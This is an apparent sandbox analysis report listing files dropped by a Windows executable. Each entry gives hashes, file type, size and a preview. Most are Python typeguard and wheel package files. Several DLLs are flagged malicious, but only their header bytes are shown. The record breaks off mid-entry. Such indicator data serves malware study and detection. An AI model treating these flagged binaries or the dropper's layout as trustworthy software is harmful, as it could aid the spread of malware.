                                                                                                                                                                                                                              MD5:F0E423EEA5C91E7AA21BDB70184B3E53
                                                                                                                                                                                                                              SHA1:A51CCDCB7A9D8C2116D1DFC16F11B3C8A5830F67
                                                                                                                                                                                                                              SHA-256:6163F7987DFB38D6BC320CE2B70B2F02B862BC41126516D552EF1CD43247E758
                                                                                                                                                                                                                              SHA-512:8BE742880E6E8495C7EC4C9ECC8F076A9FC9D64FC84B3AEBBC8D2D10DC62AC2C5053F33B716212DCB76C886A9C51619F262C460FC4B39A335CE1AE2C9A8769A8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:This is the MIT license: http://www.opensource.org/licenses/mit-license.php..Copyright (c) Alex Gr.nholm..Permission is hereby granted, free of charge, to any person obtaining a copy of this.software and associated documentation files (the "Software"), to deal in the Software.without restriction, including without limitation the rights to use, copy, modify, merge,.publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons.to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or.substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,.INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR.PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE.FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF C
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3717
                                                                                                                                                                                                                              Entropy (8bit):4.986068381037722
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DSQRbraktjaAckH94jQnJIK04Fak/grjspC3EklAJj:/Rakd4jA7ak/gvspNWmj
                                                                                                                                                                                                                              MD5:B6DAAC02F66AC8403E9061881322BABE
                                                                                                                                                                                                                              SHA1:9A94672CCFEA06156A5F8A321CD0626CFD233AE8
                                                                                                                                                                                                                              SHA-256:CF675C1C0A744F08580855390DE87CC77D676B312582E8D4CFDB5BB8FD298D21
                                                                                                                                                                                                                              SHA-512:9C6B7326C90396AA9E962C2731A1085EDB672B5696F95F552D13350843C09A246E0BBF0EC484862DFF434FA5A86DE4C0B7C963958ADE35A066B9D2384076DD47
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: typeguard.Version: 4.3.0.Summary: Run-time type checker for Python.Author-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.License: MIT.Project-URL: Documentation, https://typeguard.readthedocs.io/en/latest/.Project-URL: Change log, https://typeguard.readthedocs.io/en/latest/versionhistory.html.Project-URL: Source code, https://github.com/agronholm/typeguard.Project-URL: Issue tracker, https://github.com/agronholm/typeguard/issues.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Python: >=3.8.Description-Content
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2402
                                                                                                                                                                                                                              Entropy (8bit):5.729208478282605
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:eDnuX3DVED9HDDeDfPDLkAosGDlDiVoBFj7XH0H3HuwVB6Kgfkx7J/Q1NK1cQyxk:eyX3WRHDiLPjksV7I47J/Q1U6Qyx5fsJ
                                                                                                                                                                                                                              MD5:D680B2881597974ACD91750E5AB61010
                                                                                                                                                                                                                              SHA1:E00ED2416B5CE21641E3946905504D62D536972F
                                                                                                                                                                                                                              SHA-256:48A51959582478352275428CEECD78EF77D79AC9DAE796E39A2EAF2540282552
                                                                                                                                                                                                                              SHA-512:112172ACB515B0712AC58D78898EB159580ADA3DD3F16AABB37CB7A8D964F9E4BADF2869A245927B83B208D56904831C0F04ED925C95DFCB705801734FB0C7BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:typeguard-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typeguard-4.3.0.dist-info/LICENSE,sha256=YWP3mH37ONa8MgzitwsvArhivEESZRbVUu8c1DJH51g,1130..typeguard-4.3.0.dist-info/METADATA,sha256=z2dcHAp0TwhYCFU5Deh8x31nazElgujUz9tbuP0pjSE,3717..typeguard-4.3.0.dist-info/RECORD,,..typeguard-4.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..typeguard-4.3.0.dist-info/entry_points.txt,sha256=qp7NQ1aLtiSgMQqo6gWlfGpy0IIXzoMJmeQTLpzqFZQ,48..typeguard-4.3.0.dist-info/top_level.txt,sha256=4z28AhuDodwRS_c1J_l8H51t5QuwfTseskYzlxp6grs,10..typeguard/__init__.py,sha256=Onh4w38elPCjtlcU3JY9k3h70NjsxXIkAflmQn-Z0FY,2071..typeguard/__pycache__/__init__.cpython-312.pyc,,..typeguard/__pycache__/_checkers.cpython-312.pyc,,..typeguard/__pycache__/_config.cpython-312.pyc,,..typeguard/__pycache__/_decorators.cpython-312.pyc,,..typeguard/__pycache__/_exceptions.cpython-312.pyc,,..typeguard/__pycache__/_functions.cpython-312.pyc,,..typeguard/__pycache__/_i
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                              Entropy (8bit):4.155187698990101
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:mWSJCQEjMitjHfLvn:mrMJHfbn
                                                                                                                                                                                                                              MD5:AEAB5BCF8BF89A51C97C4CDF70578848
                                                                                                                                                                                                                              SHA1:2E9C1617560AB66431AAB90700DB901985293485
                                                                                                                                                                                                                              SHA-256:AA9ECD43568BB624A0310AA8EA05A57C6A72D08217CE830999E4132E9CEA1594
                                                                                                                                                                                                                              SHA-512:2BE73E99296DF26A28835F91DD8BC50EB104AF06A3C54666175FAF322E0AD4620453DB0388531C4113B052A92C1D2E4C3088E25AF43CDE42AA852CF7B0CB5B05
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:[pytest11].typeguard = typeguard._pytest_plugin.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10
                                                                                                                                                                                                                              Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:LEJn:M
                                                                                                                                                                                                                              MD5:004A2A8CE1AB120A63902A27D76BD964
                                                                                                                                                                                                                              SHA1:A4E367AB40410598DADD1FC5F680ED7A176BEB09
                                                                                                                                                                                                                              SHA-256:E33DBC021B83A1DC114BF73527F97C1F9D6DE50BB07D3B1EB24633971A7A82BB
                                                                                                                                                                                                                              SHA-512:0D8FF9A43897AB390AB41AFE5BAC8BD38A68C2BEF88E844E5B49BF70E3164B226975CC2717AE3DC3428D1CFBB0BE068C243F104915FEE1FFA58C23FBE76FDB89
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:typeguard.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1138456
                                                                                                                                                                                                                              Entropy (8bit):5.461877321211646
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:FrEHdcM6hb/CjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfcAa1:FrEXaCjfk7bPNfv42BN6yzUAa1
                                                                                                                                                                                                                              MD5:B848E259FABAF32B4B3C980A0A12488D
                                                                                                                                                                                                                              SHA1:DA2E864E18521C86C7D8968DB74BB2B28E4C23E2
                                                                                                                                                                                                                              SHA-256:C65073B65F107E471C9BE3C699FB11F774E9A07581F41229582F7B2154B6FC3C
                                                                                                                                                                                                                              SHA-512:4C6953504D1401FE0C74435BCEEBC5EC7BF8991FD42B659867A3529CEE5CC64DA54F1AB404E88160E747887A7409098F1A85A546BC40F12F0DDE0025408F9E27
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#.}.#.}.#.}.*..%.}..*|.!.}..*~. .}..*y.+.}..*x...}.6-|. .}.h.|.!.}.#.|.s.}.6-p.".}.6-}.".}.6-..".}.6-..".}.Rich#.}.........PE..d....f.........." ...(.@..........0*.......................................p......]M....`.........................................p...X............P.......@.......0.../...`......P^..T............................]..@............P..p............................text...!>.......@.................. ..`.rdata..\....P.......D..............@..@.data........ ......................@....pdata.......@......................@..@.rsrc........P.......$..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1107
                                                                                                                                                                                                                              Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                              MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                              SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                              SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                              SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2153
                                                                                                                                                                                                                              Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                              MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                              SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                              SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                                                                                                                                              SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4557
                                                                                                                                                                                                                              Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                              MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                              SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                              SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                              SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                              MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                              SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                              SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                              SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):104
                                                                                                                                                                                                                              Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                              MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                              SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                              SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                              SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):217088
                                                                                                                                                                                                                              Entropy (8bit):5.933475371060306
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:tWLvun+3wdpugco/89ClzK0UPI7Txi9jv19DkRHzM2HOlomD:ALWn+gdpugcok9C9OPI7gGzM+N
                                                                                                                                                                                                                              MD5:4EE5CFB68E56A5BA61248AE92C60E8C0
                                                                                                                                                                                                                              SHA1:50F064A2CB91284130F99637D2756AC07AF85B01
                                                                                                                                                                                                                              SHA-256:E3698280FF0C7769C1CDACF302688735CF4AB632989E1312D2A45747E79F5DF2
                                                                                                                                                                                                                              SHA-512:B173C595A8F7D66000AE5BF88ABC7D411A5AF01C5AC2EF73A162199F2F77404654A7F08A9E3E2F3319F5002459CBCB953311641AF525F627E077EBEB7240DC4F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{e..............b.......o.......o.......o.......o......fo.......q..........k...fo......fo......fo......Rich............PE..d... ..d.........." .........r...... .....................................................`............................................d...T........`..\.... ..h:...........p.......L..T............................M..8............................................text............................... ..`.rdata..............................@..@.data...p?.......:..................@....pdata..h:... ...<..................@..@.rsrc...\....`.......D..............@..@.reloc.......p.......H..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):34816
                                                                                                                                                                                                                              Entropy (8bit):5.607776737873708
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:qTtWWcU+d47NgCuVuA7dBm7BZ1CHrWBGwm3ReuuR+F1igomqhPGZGQvD3+VC5pEa:qM47+YedBm0WBgIuuGigahAF7+m2Ca
                                                                                                                                                                                                                              MD5:1580EE4142FB1F90F00B9F5A3CA297EB
                                                                                                                                                                                                                              SHA1:BC730100B6E8C85F709BCFB4FD7A81FB91ABF7D1
                                                                                                                                                                                                                              SHA-256:BD3F16AFB19AF91B016AB3E9669CD845F70F7A4B7A2489A81F312F060B1FB020
                                                                                                                                                                                                                              SHA-512:692C4A0595B715B14A53B41DD192AFB3058A85530975C0CAC673F3D70A2AA31FA66762FC7F453739B35971559F33E6CB20C62FC13C79796E43FF14A8728A26A1
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d.wKd.wKd.wKm..Kb.wK6.vJ`.wKp.vJf.wK6.rJh.wK6.sJl.wK6.tJg.wK..vJa.wKd.vK<.wK..~Je.wK..wJe.wK..uJe.wKRichd.wK........PE..d......d.........." .....D...@.......@....................................................`.........................................@...P...............\............................p..T............................p..8............`...............................text....C.......D.................. ..`.rdata..X,...`.......H..............@..@.data...x............v..............@....pdata...............z..............@..@.rsrc...\...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):146712
                                                                                                                                                                                                                              Entropy (8bit):6.609302620823316
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:7qLKjJj3yg1shVjm4OvfqnKAh2mrohmR5JHDbuNy:7qGEgSefI3roCDbV
                                                                                                                                                                                                                              MD5:4FADEDA3C1DA95337B67D15C282D49D8
                                                                                                                                                                                                                              SHA1:F49EE3256F8F5746515194114F7EF73D6B6141C0
                                                                                                                                                                                                                              SHA-256:28484BCEA1E387C4A41564AF8F62C040FE203FE2491E415CE90F3D7F5C7AB013
                                                                                                                                                                                                                              SHA-512:45634CAF9D9214F0E45E11A1539D8663B45527E1AE9282558B5FDB8465D90B0FABCF4C0E508504427A597BA390C029BC12068AC17D842FD0FCBB1886D252C6B1
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...x.Oc..........."...'............P..........A.....................................W....`... ......................................@.......P..8......................../......................................(....................Q..p............................text...............................`..`.data...............................@....rdata...W.......X..................@..@.pdata..............................@..@.xdata....... ......................@..@.bss.........0...........................edata.......@......................@..@.idata..8....P......................@....CRT....X....`......................@....tls.........p......................@....rsrc...............................@....reloc..............................@..B................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2343424
                                                                                                                                                                                                                              Entropy (8bit):6.507291548306534
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:11/7+Ny6imt6M5BRI+kDx1y0IQphHAokIEEKfMbrE8EPsoU0eJct/jVM5HFd5:11/7w95ctyTQHAjIEx2EPsoU0Lto7
                                                                                                                                                                                                                              MD5:45ED5B175FF3FEB7D39F8482C5E60848
                                                                                                                                                                                                                              SHA1:C0EB6EF9978FA1A62FFE8403870475B22DE3C7E7
                                                                                                                                                                                                                              SHA-256:FFADC62922AAC7F93D4EC6F2EB41CD836104F88D86B45E9FC295087FAD7D262E
                                                                                                                                                                                                                              SHA-512:69E24B20822B413EE3C7A5FFBD60F41AFB420E4BAC45DABEF31CCB2C9C3F9DC50B48E01E5C870B3367208F3A85FCEAF51F052C0B3ADF2B7A7F209A9532E36BEE
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`...$...$...$...-.o.4....`..&....`.. ....`.. ....`..,....`..*...7g..&...o...#...$...,...$...?...7g......7g..n...7g..%...7g..%...7g..%...Rich$...........PE..d..._J.f.........." ...(.2...................................................@$...........`.........................................0F".`....F".......$.......#.h............ $.....0. ....................... .(..... .@............P..(............................text....1.......2.................. ..`.rdata..$....P.......6..............@..@.data........p"..b...J".............@....pdata..h.....#.......".............@..@.rsrc.........$.......#.............@..@.reloc....... $.......#.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):262656
                                                                                                                                                                                                                              Entropy (8bit):6.282156679924657
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:gXnnqhP8Sq5V6SuRI7OzhHTnLg9uP1+74/LgHmPr9qvZqhLaHLTLrLfqeqwLii66:gXnIPE5GhHTnLg9uP1+74/LgHmPr9qvG
                                                                                                                                                                                                                              MD5:30CEC332935A3E27B399A0939BDBECD7
                                                                                                                                                                                                                              SHA1:3FDB19380F95B3299C0C0CAC4D8F21EDFC14C368
